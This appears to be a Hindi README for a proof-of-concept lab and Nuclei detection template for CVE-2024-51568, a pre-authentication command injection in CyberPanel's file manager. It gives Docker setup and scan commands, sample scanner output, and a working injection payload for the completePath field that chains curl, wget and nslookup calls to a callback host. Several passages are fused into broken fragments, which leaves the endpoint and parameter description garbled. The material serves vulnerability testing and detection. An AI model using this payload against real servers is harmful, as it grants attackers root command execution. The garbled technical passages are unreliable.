
प्रूफ-ऑफ-कॉन्सेप्ट वातावरण और CVE-2024-51568 के परीक्षण के लिए Nuclei टेम्पलेट, जो CyberPanel में प्री-ऑथेंटिकेशन कमांड इंजेक्शन भेद्यता है, जिससे रूट विशेषाधिकारों के साथ रिमोट कोड निष्पादन संभव होता है।
CVE-2024-51568 के परीक्षण के लिए एक प्रूफ-ऑफ-कॉन्सेप्ट वातावरण और Nuclei टेम्पलेट, जो CyberPanel में एक गंभीर प्री-ऑथेंटिकेशन कमांड इंजेक्शन भेद्यता है।
/filemanager/uploadcompletePathcd docker/
docker-compose up -d --build
curl -I http://localhost:8090
nuclei -t template/cve-2024-51568.yaml -u http://localhost:8090
नमूना आउटपुट:
____ __ _______/ /__ (_)
/ __ \/ / / / ___/ / _ \/ /
/ / / / /_/ / /__/ / __/ /
/_/ /_/\__,_/\___/_/\___/_/ v3.4.10
projectdiscovery.io
[INF] nuclei-templates are not installed, installing...
[INF] Successfully installed nuclei-templates at /root/nuclei-templates
[WRN] Loading 1 unsigned templates for scan. Use with caution.
[INF] Current nuclei version: v3.4.10 (latest)
[INF] Current nuclei-templates version: v10.2.8 (latest)
[INF] New templates added in latest release: 114
[INF] Templates loaded for current scan: 1
[INF] Targets loaded for current scan: 1
[INF] Using Interactsh Server: oast.online
[CVE-2024-51568] [http] [critical] http://localhost:8090/filemanager/upload
[INF] Scan completed in 5.706766772s. 1 matches found.
CyberPanel v2.3.4 में फ़ाइल अपलोड कार्यक्षमता में एक कमांड इंजेक्शन दोष है:
POST /filemanager/uploadcompletePathProcessUtilities.outputExecutioner() के माध्यम से निष्पादित होते हैंcompletePath में इंजेक्टेड कमांड के साथ दुर्भावनापूर्ण फ़ाइल अपलोड भेजता है/dev/null; curl {{interactsh-url}} || wget {{interactsh-url}} || nslookup {{interactsh-url}}; #
यह पेलोड विभिन्न सिस्टम कॉन्फ़िगरेशनों में विश्वसनीय पहचान सुनिश्चित करता है।
इस वातावरण में सुरक्षा अनुसंधान और शिक्षा के लिए जानबूझकर भेद्यताएँ शामिल हैं:
यह प्रूफ-ऑफ-कॉन्सेप्ट केवल शैक्षिक और अधिकृत सुरक्षा परीक्षण उद्देश्यों के लिए प्रदान किया गया है। उपयोगकर्ता लागू कानूनों का पालन करने और परीक्षण से पहले उचित प्राधिकरण प्राप्त करने के लिए ज़िम्मेदार हैं।